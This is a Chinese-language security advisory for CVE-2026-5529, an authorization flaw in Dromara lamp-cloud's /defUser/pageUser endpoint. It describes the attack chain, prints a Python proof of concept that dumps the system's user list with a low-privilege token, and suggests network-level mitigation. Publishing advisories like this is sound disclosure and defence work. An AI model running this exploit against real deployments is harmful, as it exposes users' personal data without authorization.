CVE-2026-5529 CVSS 4.3 中危

CVE-2026-5529 Dromara lamp-cloud 权限绕过漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5529

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dromara lamp-cloud

漏洞概述

Dromara lamp-cloud是一个功能完善的微服务权限管理系统。在5.8.1及更早版本中，系统组件DefUserController的pageUser接口存在严重的权限校验逻辑缺陷。由于未对访问请求进行充分的身份与权限验证，攻击者能够远程发起攻击，绕过安全限制获取敏感的用户页面数据。该漏洞利用门槛低，且目前已有公开的利用代码，对用户数据的机密性构成直接威胁。

技术细节

该漏洞的核心成因在于Dromara lamp-cloud项目中`DefUserController`组件的`pageUser`方法未能正确实施细粒度的访问控制策略。在默认配置下，该接口直接响应前端的分页查询请求，而未在服务端强制校验当前会话用户是否具备“用户管理”或“列表查看”等高级权限。攻击者只需拥有一个有效的低权限账户（甚至匿名访问，取决于具体配置），即可构造包含恶意参数的HTTP POST请求发送至`/defUser/pageUser`端点。服务端接收到请求后，错误地返回了完整的用户列表数据，导致系统内所有注册用户的个人信息（如账号、手机号等）被非授权获取。这是一种典型的IDOR（不安全的直接对象引用）或越权访问漏洞，严重破坏了系统的机密性原则。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是Dromara lamp-cloud，并确定其版本在5.8.1或以下。

STEP 2

获取凭证

攻击者注册一个普通低权限账户，或者利用现有的匿名访问权限（如果存在）。

STEP 3

漏洞利用

攻击者使用低权限账户的Cookie或Token，构造HTTP POST请求发送至存在漏洞的/defUser/pageUser接口。

STEP 4

数据泄露

服务器因权限校验缺失，返回了系统内所有用户的分页列表数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-5529: Improper Authorization in Dromara lamp-cloud
# Target: /defUser/pageUser

target_url = "http://target-host:port/defUser/pageUser"

# Headers simulating a low-privilege user request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/json",
    # "Authorization": "Bearer <low_privilege_token>" # Use if token is required
}

# Payload to request user list
payload = {
    "current": 1,
    "size": 10,
    "account": "",
    "nickname": ""
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit Successful! Sensitive user data leaked:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

Dromara lamp-cloud <= 5.8.1

防御指南

临时缓解措施

建议管理员在网络层面通过ACL（访问控制列表）临时阻断对/defUser/pageUser接口的外部访问，或限制仅允许管理后台IP访问该路径，直到官方补丁完成部署和测试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5529
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5529
3 Details https://www.cvedetails.com/cve/CVE-2026-5529/
4 VulDB https://vuldb.com/cve/CVE-2026-5529
5 Link https://github.com/dromara/lamp-cloud/
6 Link https://github.com/dromara/lamp-cloud/issues/403
7 Link https://vuldb.com/submit/782103
8 Link https://vuldb.com/vuln/355282
9 Link https://vuldb.com/vuln/355282/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表